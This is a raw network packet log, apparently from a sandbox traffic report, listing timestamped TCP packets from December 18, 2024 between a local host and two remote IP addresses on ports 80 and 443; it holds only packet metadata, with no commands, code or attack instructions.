                                                                                                                                                              Dec 18, 2024 11:47:43.888185024 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.888222933 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.888782978 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.888829947 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.889019966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.889062881 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.889198065 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.889238119 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.890114069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.890160084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.890295982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.890337944 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.891180038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.891223907 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.891279936 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.891339064 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.892364025 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.892410040 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.892474890 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.892515898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.893496037 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.893544912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.893606901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.893646955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.894697905 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.894748926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.894798994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.894838095 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.895875931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.895916939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.896014929 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.896051884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.897083998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.897129059 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.897289991 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.897330046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.898230076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.898271084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.898339987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.898380041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.899435997 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.899481058 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.899590969 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.899632931 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.900652885 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.900702953 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.900753975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.900790930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.901793957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.901840925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.901889086 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.901927948 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.902980089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.903024912 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.903089046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.903126955 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.904172897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.904215097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.904273987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.904311895 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.905364990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.905407906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.905472994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.905510902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.906639099 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.906683922 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.906760931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.906797886 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.907850027 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.907891035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.907921076 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.907957077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.908936977 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.908981085 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.909054041 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.909091949 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.910105944 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.910149097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.910182953 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.910219908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.911319971 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.911375046 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.911463976 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.911505938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.912565947 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.912625074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.912667990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.912705898 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.913641930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.913680077 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.913739920 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.913780928 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.914844990 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.914889097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.914948940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.914988041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.916037083 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.916083097 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.916126966 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.916165113 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.917190075 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.917229891 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.917341948 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.917378902 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.918399096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.918442965 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.918494940 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.918534994 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.919573069 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.919619083 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.919689894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.919728041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.920731068 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.920770884 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.920861006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.920898914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.922014952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.922056913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.922135115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.922172070 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.923414946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.923461914 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.923657894 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.923696041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.924513102 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.924555063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.924595118 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.924628973 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.925472975 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.925515890 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.925549030 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.925585032 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.926671982 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.926716089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.926743984 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.926779985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.927853107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.927891970 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.927908897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.927946091 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.929040909 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.929084063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.929157972 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.929194927 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.930282116 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.930325985 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.930372000 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.930408001 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.931430101 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.931469917 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.931546926 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.931585073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.932657957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.932709932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.932828903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.932868004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.933820963 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.933861971 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.933902979 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.933938980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.935026884 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.935070992 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.935153008 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.935190916 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.936355114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.936389923 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.936403990 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.936420918 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.937357903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.937402010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.937470913 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.937510014 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.938563108 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.938611031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.938674927 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.938713074 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.939723015 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.939765930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.939837933 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.939876080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.941004038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.941050053 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.941066980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.941102028 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.942121983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.942166090 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.942280054 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.942322016 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.943322897 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.943373919 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.943639994 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.943685055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.944461107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.944510937 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.944556952 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.944597006 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.945696115 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.945739031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.945808887 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.945846081 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.946839094 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.946886063 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.946938038 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.946976900 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.948028088 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.948071957 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.948256016 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.948292017 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.949201107 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.949245930 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:43.949317932 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:43.949364901 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.030508995 CET44349880104.21.64.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.030599117 CET44349880104.21.64.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.030718088 CET49880443192.168.2.6104.21.64.80
                                                                                                                                                              Dec 18, 2024 11:47:44.037996054 CET49880443192.168.2.6104.21.64.80
                                                                                                                                                              Dec 18, 2024 11:47:44.038017988 CET44349880104.21.64.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.057996988 CET49886443192.168.2.6104.21.64.80
                                                                                                                                                              Dec 18, 2024 11:47:44.058053017 CET44349886104.21.64.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.058140039 CET49886443192.168.2.6104.21.64.80
                                                                                                                                                              Dec 18, 2024 11:47:44.058437109 CET49886443192.168.2.6104.21.64.80
                                                                                                                                                              Dec 18, 2024 11:47:44.058449030 CET44349886104.21.64.80192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.079232931 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.079260111 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.079289913 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.079339981 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.079519987 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.079555988 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.079704046 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.079742908 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.080621958 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.080668926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.080729961 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.080765009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.081821918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.081866980 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.081924915 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.081958055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.083013058 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.083064079 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.083095074 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.083128929 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.084172010 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.084211111 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.084266901 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.084300041 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.085341930 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.085385084 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.085534096 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.085571051 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.086530924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.086566925 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.086639881 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.086683035 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.087752104 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.087790966 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.087838888 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.087873936 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.088900089 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.088943005 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.088989973 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.089056969 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.090107918 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.090158939 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.090272903 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.090312004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.091325998 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.091370106 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.091454983 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.091491938 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.092497110 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.092536926 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.092577934 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.092612982 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.093642950 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.093683004 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.093734980 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.093769073 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.094852924 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.094909906 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.094944954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.094984055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.096008062 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.096055031 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.096107006 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.096152067 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.097345114 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.097388029 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.097496033 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.097531080 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.098525047 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.098567009 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.098594904 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.098628998 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.099533081 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.099574089 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.099643946 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.099682093 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.100775957 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.100827932 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.100878954 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.100918055 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.101932049 CET804987831.41.244.11192.168.2.6
                                                                                                                                                              Dec 18, 2024 11:47:44.101974010 CET4987880192.168.2.631.41.244.11
                                                                                                                                                              Dec 18, 2024 11:47:44.102068901 CET804987831.41.244.11192.168.2.6
